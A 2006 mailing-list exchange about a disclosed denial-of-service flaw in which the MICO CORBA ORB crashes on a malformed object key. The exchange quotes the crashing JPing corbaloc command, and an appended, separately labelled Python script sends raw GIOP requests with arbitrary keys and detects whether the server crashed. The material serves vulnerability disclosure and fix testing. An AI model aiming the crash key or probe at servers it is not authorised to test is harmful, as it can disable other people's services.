Message-ID: <Pine.LNX.4.63.0607101921400.3835@silence.gardas.net>
Date: Mon Jul 10 21:11:11 2006
From: kgardas at objectsecurity.com (Karel Gardas)
Subject: Re: Mico crashes when contacted with wrong IOR / DoS


Hi Christoph,

I'm not angry at all and I hope you are neither. Thank you for taking the 
time to provide us with a nice way to duplicate the issue, and also for 
giving us time to fix it before full disclosure, which was not used due to 
communication/organization issues. Anyway, points taken: we (the MICO 
community) should provide a single email address for all vulnerability 
reports. I added the JacORB notes in my original reply since I thought 
you were also testing the issue with JacORB; perhaps I read this in 
some of your files.

Thanks,
Karel

On Mon, 10 Jul 2006, tuergeist wrote:

> Hi,
>
> I would just give my 2 cents
>
>> I would just like to add some corrections to disclosure below.
>> 
>
>> > == 1. Affected Vendor ==
>> >   Object Security
>> 
>> This information is incorrect. ObjectSecurity is not the vendor of the
>> MICO ORB. MICO is a free software project licensed under LGPL/GPL
>> licenses. ObjectSecurity is its long time user and contributor besides
>> lots of other companies and supporters.
> Ok. Commercially supported by the CORBA specialists: Object Security.
> However, look @ point 2 "Open Source ORB". I think it was clear.
>
>> > == 3. Vulnerability ==
>> >   MICO crashes when contacted with wrong object key (part: orb-id or
>> >   orb-creation time)
>> 
>> Side note: the object ID is an opaque value, so we do not distinguish any part of
>> it as orb-id or orb-creation time. Perhaps you got this knowledge from
>> another ORB, but this is strictly ORB dependent.
> Yes. I know the object ID is an opaque value. But I took a look into the
> sources - I only wanted to give extra information.
>
>> > == 4. Safety Hazard ==
>> >   critical, potential Denial-of-Service
>> >
>> > == 5. Disclosure Timeline ==
>> >   2006-06-27 Problem found and analysed / tested with other versions
>> >   2006-06-29 Vulnerability reported to vendor and MICOs
>> >                devel-mailing-list
>> 
>> Unfortunately your email has not reached the mico-devel@...o.org mailing list
>> yet. Also, if you would like to contact ObjectSecurity directly with a
>> security issue, please consider using the security@...ectsecurity.com email
>> address next time.
>> 
> At 29.06.2006 12:43 CEST I wrote you AND mico-devel, but my "message
> to Mico-devel awaits moderator approval" - This is definitely NOT my
> problem.
>
>> > == 7. Patch / Workaround ==
>> >   No patch available yet.
>> 
>> Patch is already available and the main MICO download page contains a link
>> to it: http://mico.org/down.html
> It was not at the time of full disclosure. I updated this when the update was available.
>
>> >       $ java JPing -p corbaloc::192.168.1.10:8010//200/1151845678/0/_5
>> >     orb.string_to_object             ... ok
>> >     object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
>> >     vmcid: SUN  minor code: 208 completed: Maybe
>> 
>> Side note: if you test fixed MICO together with your ping utility
>> running on top of JacORB, you will get COMM_FAILURE exception
>> too. That's because of a bug in JacORB [...]
> As you can see, I am not using JacORB; I am not related to JacORB or
> anything else. In this example I used the SUN JDK ORB. Read, think,
> answer. I wrote "It's also possible to use JacORBs pingo.." - "also" in
> this case doesn't mean "exactly".
>
> The point wasn't what my client said - the point was, that mico crashed!!!
>
> regarding JacORB: report it to the JacORB community, not to me.
>
> Regards,
> Christoph
>
> p.s. The other way is not to contact you or full disclosure but
> selling the information. So, don't look back in anger.
>

--
Karel Gardas                  kgardas@...ectsecurity.com
ObjectSecurity Ltd.           http://www.objectsecurity.com
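As an added example, not part of this thread and not code from MICO, ObjectSecurity or the reporter: a small Python probe that sends a raw GIOP 1.0 LocateRequest carrying an arbitrary object key (the corbaloc URL and key string are copied from the JPing call in the report; the GIOP message layout and constants are from the CORBA/GIOP specification) and reports what the server did with it. Talking GIOP directly sidesteps client-side ORB behaviour such as the JacORB COMM_FAILURE mentioned above, so the verdict reflects the server alone: a LocateReply with UNKNOWN_OBJECT means the ORB rejected the key cleanly, while an EOF with no reply is the symptom the report describes. The encoder, decoder and classifier run offline; only `probe()` needs a live endpoint.

```python
"""Raw GIOP 1.0 LocateRequest probe for an IIOP endpoint (added example;
not from the thread). The corbaloc URL format and object key come from
the report; GIOP constants come from the CORBA specification."""
import socket
import struct
from urllib.parse import unquote_to_bytes

GIOP_MAGIC = b"GIOP"
MSG_LOCATE_REQUEST = 3
MSG_LOCATE_REPLY = 4
MSG_CLOSE_CONNECTION = 5
MSG_MESSAGE_ERROR = 6
# LocateStatusType values carried by a GIOP 1.0 LocateReply
LOCATE_STATUS = {0: "UNKNOWN_OBJECT", 1: "OBJECT_HERE", 2: "OBJECT_FORWARD"}
DEFAULT_IIOP_PORT = 2809


def parse_corbaloc(url):
    """Split 'corbaloc::host:port/key' (one iiop address) into
    (host, port, key_bytes); the key is %XX-unescaped."""
    if not url.startswith("corbaloc:"):
        raise ValueError("not a corbaloc URL")
    addr, sep, key = url[len("corbaloc:"):].partition("/")
    if not sep:
        raise ValueError("corbaloc URL has no object key")
    if addr.startswith("iiop:"):          # explicit protocol ...
        addr = addr[len("iiop:"):]
    elif addr.startswith(":"):            # ... or the 'corbaloc::' shorthand
        addr = addr[1:]
    else:
        raise ValueError("only iiop addresses are handled here")
    if "@" in addr:                       # drop an optional '1.2@' version prefix
        addr = addr.split("@", 1)[1]
    host, sep, port = addr.rpartition(":")
    if not sep:
        host, port = addr, str(DEFAULT_IIOP_PORT)
    return host, int(port), unquote_to_bytes(key)


def build_locate_request(request_id, object_key):
    """Big-endian GIOP 1.0 LocateRequest: 12-byte header, then CDR
    request_id (ulong) and object_key (sequence<octet>)."""
    body = struct.pack(">II", request_id, len(object_key)) + object_key
    header = GIOP_MAGIC + bytes([1, 0, 0, MSG_LOCATE_REQUEST])
    return header + struct.pack(">I", len(body)) + body


def parse_giop_header(data):
    """Return ((major, minor), struct byte-order prefix, message type, body size)."""
    if len(data) < 12 or data[:4] != GIOP_MAGIC:
        raise ValueError("not a GIOP message")
    major, minor, flags, msg_type = data[4:8]
    endian = "<" if flags & 1 else ">"    # byte_order flag: 1 = little-endian
    (size,) = struct.unpack(endian + "I", data[8:12])
    return (major, minor), endian, msg_type, size


def parse_locate_reply(data):
    """Return (request_id, status name) from a complete LocateReply message."""
    _, endian, msg_type, size = parse_giop_header(data)
    if msg_type != MSG_LOCATE_REPLY:
        raise ValueError("expected LocateReply, got message type %d" % msg_type)
    if size < 8 or len(data) < 12 + size:
        raise ValueError("truncated LocateReply")
    request_id, status = struct.unpack(endian + "II", data[12:20])
    return request_id, LOCATE_STATUS.get(status, "status_%d" % status)


def classify(data):
    """Turn the bytes received after our LocateRequest into a verdict."""
    if len(data) < 12:
        # A healthy ORB always answers a LocateRequest; EOF here is the crash
        # symptom. Confirm by re-probing with a key the server is known to serve.
        return "no reply: peer closed the connection (possible crash)"
    try:
        _, _, msg_type, _ = parse_giop_header(data)
    except ValueError as exc:
        return "non-GIOP reply: %s" % exc
    if msg_type == MSG_LOCATE_REPLY:
        return "LocateReply %s" % parse_locate_reply(data)[1]
    if msg_type == MSG_MESSAGE_ERROR:
        return "MessageError: server rejected the request"
    if msg_type == MSG_CLOSE_CONNECTION:
        return "CloseConnection: server closed the session"
    return "unexpected GIOP message type %d" % msg_type


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def probe(url, request_id=1, timeout=5.0):
    """Send one LocateRequest for the key in `url` and classify the outcome."""
    host, port, key = parse_corbaloc(url)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_locate_request(request_id, key))
        try:
            data = recv_exact(sock, 12)
            if len(data) == 12:
                data += recv_exact(sock, parse_giop_header(data)[3])
        except (ConnectionResetError, socket.timeout) as exc:
            return "no reply: %s" % exc.__class__.__name__
    return classify(data)


if __name__ == "__main__":
    import sys
    # e.g. corbaloc::192.168.1.10:8010//200/1151845678/0/_5 (key from the report)
    print(probe(sys.argv[1]))
```

Run it twice per target: once with a key the server is known to serve (expect OBJECT_HERE) and once with a mangled one; a server that answers UNKNOWN_OBJECT to the second probe and still answers the first afterwards has handled the bad key without falling over, which is the behaviour a fixed build should show.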
